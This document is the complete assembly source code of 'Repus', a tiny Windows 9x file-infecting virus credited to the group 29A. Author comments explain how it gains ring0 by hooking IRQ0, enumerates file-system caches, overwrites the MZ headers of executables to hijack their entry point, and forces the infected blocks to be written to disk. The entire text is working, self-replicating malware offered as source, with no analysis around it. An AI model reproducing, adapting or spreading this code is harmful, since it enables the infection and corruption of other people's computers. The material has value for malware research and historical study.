Win9x.Virus.Repus - Source Code

1.  
2. ;=============;
3. ; Repus virus ;
4. ;=============;
5.  
6. ;Coded by Super/29A
7.  
8. ;VirusSize = 128 bytes !!!
9.  
10.  
11. ;This is the third member of the Repus family
12.  
13.  
14. ;-When an infected file is executed the virus patches IRQ0 handler and waits
15. ; for it to return control to virus in ring0
16. ;-Once in ring0, the virus searches in all caches a valid MZheader to infect,
17. ; modifying EntryPoint (in PEheader) so virus can get control on execution
18. ;-It will infect no more than one MZheader at a time per file system
19. ;-MZheader will be overwritten, however windows executes it with no problems
20. ; (tested under win95,win98,winNT and Win2K)
21. ;-When executing a non infected file that imports APIs from an infected DLL,
22. ; virus will get control on DLL inicialization and infect more MZheaders
23.  
24.  
25. ;-------------------------------------------------------------------
26.  
27.  .386p
28.  .model flat,STDCALL
29.  
30.  extrn ExitProcess : near
31.  extrn MessageBoxA : near
32.  
33. ;-------------------------------------------------------------------
34.  
35. VirusSize = (VirusEnd - VirusStart)
36.  
37. VCache_Enum macro
38.  int 20h
39.  dw 0009h
40.  dw 048Bh
41. endm
42.  
43. ;-------------------------------------------------------------------
44.  
45. .data
46.  
47. Title:
48.  db 'Super/29A presents...',0
49.  
50. Text:
51.  db 'Repus.'
52.  db '0' + (VirusSize/100) mod 10
53.  db '0' + (VirusSize/10) mod 10
54.  db '0' + (VirusSize/1) mod 10
55.  db 0
56.  
57. ;-------------------------------------------------------------------
58.  
59.  
60. .code
61.  
62. ;===================================================================
63.  
64. VirusStart:
65.  
66.    db 'M'   ; dec ebp
67.  
68. VirusEntryPoint:
69.  
70.    db 'Z'   ; pop edx
71.  
72.    push edx
73.    dec edx
74.    jns JumpHost   ; exit if we are running winNT
75.  
76.    mov ebx,0C0001100h   ; IRQ0 ring0 handler
77.  
78.    mov dl,0C3h
79.  
80.    xchg dl,[ebx]   ; hook IRQ0 to get ring0
81.  
82. Wait_IRQ0:
83.  
84.    cmp esp,edx
85.    jb Wait_IRQ0
86.  
87.  
88. ;Now we are in ring0
89.  
90.  
91.    xchg dl,[ebx]
92.  
93.    lea edx,[eax+(InfectCache-VirusEntryPoint)]   ; EDX = infection routine
94.  
95.    fld qword ptr [eax+(Next_FSD-VirusEntryPoint)]   ; save VxD dinamic call
96.  
97. Next_FSD:
98.  
99.    VCache_Enum   ; enumerate all caches
100.  
101.    inc ah
102.    jnz Next_FSD   ; try next file system
103.  
104.    call ebx   ; return control to IRQ0 and return just after the CALL
105.  
106.  
107. ;Now we are in ring3
108.  
109.  
110. JumpHost:
111.  
112.    jmp HostEntryPoint   ; return control to host
113.  
114. ;-------------------------------------------------------------------
115.  
116. InfectCache:
117.  
118.    xor dl,dl   ; EDX = ImageBase
119.  
120.    mov edi,[esi+10h]   ; EDI = MZheader
121.  
122.    movzx ecx,byte ptr [edi+3Ch]
123.  
124.    cmp byte ptr [edi+ecx],'P'   ; check for PEheader
125.    jnz _ret
126.  
127. Offset3B:
128.  
129.    and eax,00000080h   ; EAX = 0
130.  
131.    xchg esi,edx   ; ESI = ImageBase
132.                   ; EDX = Cache Block Structure
133.  
134.    cmpsb   ; check for MZheader
135.    jnz _ret
136.  
137.    mov [esi-1+(Offset3B+1-VirusStart)],ecx   ; save offset of PEheader
138.  
139.    fst qword ptr [esi-1+(Next_FSD-VirusStart)]   ; restore VxD dinamic call
140.  
141.    inc eax   ; EAX = 1
142.  
143.    xchg eax,[edi-1+ecx+28h]   ; set virus EntryPoint
144.  
145.    sub eax,(JumpHost+5-VirusStart)
146.  
147.    jb _ret   ; jump if its already infected
148.  
149.    mov cl,(VirusSize-1)
150.  
151.    rep movsb   ; copy virus to MZheader
152.  
153.    mov [edi+(JumpHost+1-VirusEnd)],eax   ; fix jump to host
154.  
155.  
156. ;Here we are gonna find the pointer to the pending cache writes
157.  
158.  
159.    mov ch,2
160.    lea eax,[ecx-0Ch]  ; EAX=1F4h   ;-D
161.    mov edi,[edx+0Ch]  ; EDI = VRP (Volume Resource Pointer)
162.    repnz scasd
163.    jnz _ret  ; not found  :-(
164.  
165.    ; EDI = offset in VRP which contains PendingList pointer
166.  
167.    cmp [edi],ecx   ; check if there are other pending cache writes
168.    ja _ret
169.  
170.    cmp [edi+30h],ah   ; only infect logical drives C,D,...
171.    jbe _ret
172.  
173.  
174. ;Now we are gonna insert this cache in the pending cache writes
175.  
176.  
177.    or byte ptr [edx+32h],ah  ; set dirty bit
178.  
179.    mov [edx+1Ch],edx  ; set PendingList->Next
180.    mov [edx+20h],edx  ; set PendingList->Previous
181.  
182.    mov [edi],edx  ; set PendingList pointer
183.  
184. _ret:
185.  
186.    ret
187.  
188.    db '29A'
189.  
190. VirusEnd:
191.  
192. ;===================================================================
193.  
194.  db 1000h dup(90h)
195.  
196. HostEntryPoint proc near
197.  
198.  push 0
199.  push offset Title
200.  push offset Text
201.  push 0
202.  call MessageBoxA
203.  
204.  push 0
205.  call ExitProcess
206.  
207. HostEntryPoint endp
208.  
209. ;===================================================================
210.  
211. ends
212. end VirusEntryPoint